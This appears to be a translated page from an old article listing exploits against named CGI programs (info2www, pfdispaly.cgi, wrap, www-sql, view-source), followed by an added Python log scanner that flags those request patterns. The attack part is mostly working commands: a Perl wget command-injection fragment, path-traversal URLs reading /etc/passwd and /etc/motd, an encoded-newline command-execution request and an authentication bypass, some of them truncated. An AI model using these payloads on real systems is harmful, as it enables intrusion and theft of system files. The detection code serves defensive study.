|
CGI Vulnerabilities (2)

}
$text="${URL}/;IFS=\8;${CMD};echo";
$text =~ s/ /\$\{IFS\}/g;
#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); # lynx can be used instead if the wget command is not available
#system({"lynx"} "lynx", $text);

6. Vulnerability in some versions (1.1) of info2www

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami
$ You have new mail.
$

To be honest, I don't quite understand it.

7. pfdispaly.cgi

lynx -source \
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

pfdispaly.cgi has another vulnerability that allows command execution:

lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cg...me%20-a'

or

lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/...vil:0.0'

8. wrap

lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

9. www-sql

This lets you read some access-restricted pages. For example, if you enter the following in your browser, you are asked for an account name and password:

http://your.server/protected/something.html

With www-sql that is not necessary:

http://your.server/cgi-bin/www-sql/protect...something.html

10. view-source

lynx http://www.victim.com/cgi-bin/vi ... ../../../etc/passwd
|
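A defensive counterpart to the request patterns listed above, as an added example that is not part of the original article: a Python access-log scanner that flags requests to the CGI programs named on this page when they carry a traversal sequence, an encoded newline, shell metacharacters, or (for www-sql) a protected path in PATH_INFO. The log format, the sample lines and the `/protected/` prefix are constructed assumptions.

```python
import re
from urllib.parse import unquote

# CGI programs named on this page.
SCRIPTS = ("info2www", "pfdispaly.cgi", "wrap", "www-sql", "view-source")
# Assumption: directories on the local server that require authentication.
PROTECTED_PREFIXES = ("/protected/",)

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_RE = re.compile(
    r"^/cgi-bin/(%s)(?=[/?]|$)(.*)$" % "|".join(map(re.escape, SCRIPTS)), re.S)

# Constructed sample lines in common log format (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0" 200 512',
    '192.0.2.10 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/wrap?/../../../../../etc HTTP/1.0" 200 2048',
    '192.0.2.11 - - [01/Jan/2000:10:01:00 +0000] "GET /cgi-bin/www-sql/protected/something.html HTTP/1.0" 200 900',
    '192.0.2.12 - - [01/Jan/2000:10:02:00 +0000] "GET /cgi-bin/pfdispaly.cgi?%0Aplaceholder HTTP/1.0" 200 0',
    '192.0.2.13 - - [01/Jan/2000:10:03:00 +0000] "GET /cgi-bin/info2www?(dir)Top HTTP/1.0" 200 300',
    '192.0.2.13 - - [01/Jan/2000:10:03:02 +0000] "GET /index.html HTTP/1.0" 200 100',
]


def classify(log_line):
    """Return (script, reasons) for a suspicious request, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = unquote(m.group(1))  # decode %2e, %0A and similar escapes first
    m = SCRIPT_RE.match(target)
    if not m:
        return None  # not one of the CGI programs of interest
    script, rest = m.group(1), m.group(2)
    reasons = []
    if "../" in rest or rest.endswith(".."):
        reasons.append("path traversal")
    if "\n" in rest or "\r" in rest:
        reasons.append("encoded newline")
    if re.search(r"[;|`$]", rest):
        reasons.append("shell metacharacter")
    if script == "www-sql" and rest.startswith(PROTECTED_PREFIXES):
        reasons.append("protected path via PATH_INFO")
    return (script, reasons) if reasons else None


def scan(lines):
    """Return [(line_number, script, reasons)] for every flagged line."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, *hit) for n, hit in hits if hit]
```

Calling `scan(SAMPLE_LOG)` flags the first four lines and leaves the ordinary info2www lookup and the static page alone.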